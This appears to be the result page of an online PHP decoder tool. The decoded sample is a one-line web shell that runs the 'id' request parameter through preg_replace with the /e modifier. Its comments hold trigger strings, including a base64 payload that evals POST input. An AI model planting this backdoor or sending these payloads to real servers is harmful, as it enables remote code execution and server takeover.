Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $a = $_REQUEST['id']; preg_replace('/.*/e',' '.$a,''); ?> /* :?id=eval('phpinfo(..

Decoded Output download

<?php  
$a = $_REQUEST['id'];
preg_replace('/.*/e',' '.$a,'');
?>

/* 
:?id=eval('phpinfo();');
:00.php?id=eval%28base64_decode%28%22QGV2YWwoJF9QT1NUWydjbWQnXSk7%22%29%29;  cmd
*/

Did this file decode correctly?

Original Code

<?php  
$a = $_REQUEST['id'];
preg_replace('/.*/e',' '.$a,'');
?>

/* 
:?id=eval('phpinfo();');
:00.php?id=eval%28base64_decode%28%22QGV2YWwoJF9QT1NUWydjbWQnXSk7%22%29%29;  cmd
*/

Function Calls

preg_replace 1

Variables

$a None

Stats

MD5 c9a14308c91eb6201a9b31bfaac0966d
Eval Count 1
Decode Time 105 ms